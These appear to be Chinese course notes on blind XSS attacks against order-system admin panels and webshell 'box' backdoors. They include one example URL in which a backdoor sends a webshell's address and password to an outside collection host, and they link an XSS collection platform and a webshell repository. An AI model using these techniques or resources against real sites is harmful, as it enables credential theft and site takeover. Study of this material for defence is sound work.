思维导图
xss漏洞存在的地方
留言板 评论区 订单系统 意见反馈等
#cookie session
用户凭据:通过凭据可以判断对方身份信息
cookie 存储本地 存活时间较长 小中型
session 会话 存储服务器 存活时间较短 大型
演示案例:
某营销订单系统 XSS 盲打_平台
前端订单界面
后端管理界面
演示这个案例的意图是:了解在什么位置利用xss,从而获取有用信息!
使用xss平台/工具
自己编写代码接收
某 Shell 箱子系统 XSS 盲打_工具
跨站漏洞可以应用在很多方面
webShell 箱子(后门中的后门) 一句话shell ,脚本后门(大马),脚本控制网站,别有用心的人会在脚本中再写上后面,你入侵一个网站之后,你用他的后门脚本对网站进行一个控制,那么入侵网站的信息,你的后门地址,后门密码,会发送到一个地方,俗称 箱子、信封。
[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-XiGfLgiI-1646998304883)(image/QQ截图20220311180354.png)]
把你的后门地址和密码传回…
http://www.mumasp.com/xz/sx.asp?u=39.96.44.170/x.asp&p=mumaasp.com
其他参考应用案例-后台权限维持
工具 Http/s 数据包提交 Postman 使用
postman软件
因为采用的是session验证, 那么xss平台是接收不到PHPSESSION的,
session 是存储在网站服务器的。
涉及资源:
http://xss.fbisb.com/
https://github.com/tennc/webshell
https://www.postman.com/downloads/
https://pan.baidu.com/s/1lIUZvEVXs1du-Bmkt7-abA 提取码:xiao
https://pan.baidu.com/s/13H4N1VTBVwd3t8YWpECBFw 提取码:
xiao